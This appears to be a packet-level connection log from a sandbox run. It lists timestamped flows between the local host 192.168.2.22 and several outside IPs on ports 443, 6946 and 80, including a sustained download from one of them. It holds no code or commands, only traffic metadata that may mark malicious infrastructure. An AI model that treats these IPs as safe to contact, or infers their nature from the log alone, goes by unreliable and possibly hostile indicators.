                                                                                                            Nov 20, 2024 16:58:14.194554090 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.194638014 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.194654942 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.198357105 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.198479891 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.198496103 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.201560974 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.201639891 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.201656103 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.204385996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.204502106 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.204518080 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.208904028 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.209054947 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.209069014 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.360426903 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.360549927 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.360589027 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362508059 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362531900 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362550974 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362603903 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.362603903 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.362657070 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.362763882 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.366399050 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.366420031 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.366492033 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.366492033 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.366533995 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.369352102 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.369389057 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.370601892 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.370623112 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.370759964 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.372385979 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.372406006 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.372700930 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.372718096 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.376211882 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.378587008 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.378593922 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.380517960 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.381124020 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.381133080 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.383187056 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.383255959 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.383264065 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.386231899 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.386559010 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.386569023 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.389518976 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.390588999 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.390595913 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.392858028 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.392972946 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.392982006 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.395901918 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.396037102 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:14.396044970 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.399693012 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:14.400628090 CET49174443192.168.2.22142.215.209.78
Timestamp                          | Source Port | Dest Port | Source IP       | Dest IP
Nov 20, 2024 16:58:14.400636911 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.403037071 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.403347969 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.403354883 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.406636953 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.407341003 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.407350063 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.409930944 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.410149097 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.410156965 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.561197996 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.561355114 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.561403036 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.564543962 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.564548016 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.564694881 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.564754009 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.564778090 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.564959049 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.571155071 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.571166992 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.571187973 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.571239948 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.571239948 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.574337006 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.574345112 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.574419975 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.574436903 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.578962088 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.578993082 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.579034090 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.579052925 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.579250097 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.581985950 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.581993103 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.582063913 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.582077980 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.582127094 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.582375050 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.582386971 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.585422993 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.585498095 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.585514069 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.588238001 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.588311911 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.588325024 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.590895891 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.591029882 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.591043949 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.591644049 CET | 443   | 49174 | 142.215.209.78 | 192.168.2.22
Nov 20, 2024 16:58:14.591763020 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:14.592288017 CET | 49174 | 443   | 192.168.2.22   | 142.215.209.78
Nov 20, 2024 16:58:15.031200886 CET | 6946  | 49176 | 192.3.101.149  | 192.168.2.22
Nov 20, 2024 16:58:15.230868101 CET | 49176 | 6946  | 192.168.2.22   | 192.3.101.149
Nov 20, 2024 16:58:15.284429073 CET | 6946  | 49176 | 192.3.101.149  | 192.168.2.22
Nov 20, 2024 16:58:15.288453102 CET | 49176 | 6946  | 192.168.2.22   | 192.3.101.149
Nov 20, 2024 16:58:15.408087015 CET | 6946  | 49176 | 192.3.101.149  | 192.168.2.22
Nov 20, 2024 16:58:15.408147097 CET | 49176 | 6946  | 192.168.2.22   | 192.3.101.149
Nov 20, 2024 16:58:15.528150082 CET | 6946  | 49176 | 192.3.101.149  | 192.168.2.22
Nov 20, 2024 16:58:15.762100935 CET | 6946  | 49176 | 192.3.101.149  | 192.168.2.22
Nov 20, 2024 16:58:15.770500898 CET | 49176 | 6946  | 192.168.2.22   | 192.3.101.149
Nov 20, 2024 16:58:15.891777992 CET | 6946  | 49176 | 192.3.101.149  | 192.168.2.22
Nov 20, 2024 16:58:15.969449997 CET | 6946  | 49176 | 192.3.101.149  | 192.168.2.22
Nov 20, 2024 16:58:16.244914055 CET | 49176 | 6946  | 192.168.2.22   | 192.3.101.149
Nov 20, 2024 16:58:17.565862894 CET | 49177 | 80    | 192.168.2.22   | 178.237.33.50
Nov 20, 2024 16:58:17.685580969 CET | 80    | 49177 | 178.237.33.50  | 192.168.2.22
Nov 20, 2024 16:58:17.685702085 CET | 49177 | 80    | 192.168.2.22   | 178.237.33.50
Nov 20, 2024 16:58:17.770757914 CET | 49177 | 80    | 192.168.2.22   | 178.237.33.50
Nov 20, 2024 16:58:17.890424013 CET | 80    | 49177 | 178.237.33.50  | 192.168.2.22
Nov 20, 2024 16:58:19.031322002 CET | 80    | 49177 | 178.237.33.50  | 192.168.2.22
Nov 20, 2024 16:58:19.031413078 CET | 49177 | 80    | 192.168.2.22   | 178.237.33.50
Nov 20, 2024 16:58:19.124666929 CET | 49176 | 6946  | 192.168.2.22   | 192.3.101.149
Nov 20, 2024 16:58:19.251869917 CET | 6946  | 49176 | 192.3.101.149  | 192.168.2.22
Nov 20, 2024 16:58:20.042874098 CET | 80    | 49177 | 178.237.33.50  | 192.168.2.22
Nov 20, 2024 16:58:20.042937040 CET | 49177 | 80    | 192.168.2.22   | 178.237.33.50
Nov 20, 2024 16:58:27.964181900 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:28.083915949 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:28.083993912 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:28.084156036 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:28.203808069 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247379065 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247396946 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247410059 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247423887 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247437000 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247448921 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247461081 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247474909 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247488976 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247487068 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.247504950 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.247513056 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.247528076 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.247694016 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.369322062 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.369458914 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.369527102 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.373313904 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.444989920 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.445043087 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.445085049 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.449233055 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.449275970 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.449338913 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.457583904 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.457627058 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.457663059 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.466676950 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.466723919 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.466728926 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.474317074 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.474354982 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.474464893 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.482747078 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.482791901 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.482851982 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.491096020 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.491139889 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.491147041 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.499485016 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.499531031 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.499620914 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.507982969 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.508024931 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.508666992 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.516249895 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.516285896 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.516330004 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.565313101 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.565329075 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.565382957 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.646271944 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.646332026 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.646342039 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.648921967 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.648957014 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.648969889 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.654017925 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.654066086 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.654105902 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.659028053 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.659071922 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.659112930 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.664159060 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.664221048 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.664226055 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.669380903 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.669435978 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.669498920 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.674679995 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.674731016 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.674915075 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.679868937 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.679920912 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.679928064 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.685168982 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.685264111 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.685292959 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.690210104 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.690284014 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.690289021 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.695417881 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.695492029 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.695523977 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.700607061 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.700685024 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.700695038 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.704858065 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.704925060 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.704955101 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.709089994 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.709139109 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.709151030 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.713282108 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.713341951 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.713413000 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.717502117 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.717516899 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.717549086 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.721736908 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.721792936 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.721829891 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.729583025 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.729597092 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.729640007 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.732439041 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.732580900 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.732615948 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.766020060 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.766055107 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.766123056 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.768094063 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.847450972 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.847482920 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.847502947 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.849067926 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.849104881 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.849173069 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.852238894 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.852277040 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.852334023 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.855496883 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.855530977 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
Nov 20, 2024 16:58:29.855609894 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.858743906 CET | 80    | 49178 | 192.3.220.29   | 192.168.2.22
Nov 20, 2024 16:58:29.858778954 CET | 49178 | 80    | 192.168.2.22   | 192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.858786106 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.861748934 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.861783028 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.861844063 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.864737034 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.864768982 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.864810944 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.867769957 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.867784023 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.867806911 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.870728970 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.870764971 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.870893002 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.873719931 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.873753071 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.873826981 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.876678944 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.876714945 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.876789093 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.879715919 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.879754066 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.879806995 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.882694006 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.882730961 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.882781982 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.885768890 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.885813951 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.885857105 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.888679028 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.888726950 CET4917880192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:29.888792038 CET8049178192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:29.891710043 CET8049178192.3.220.29192.168.2.22
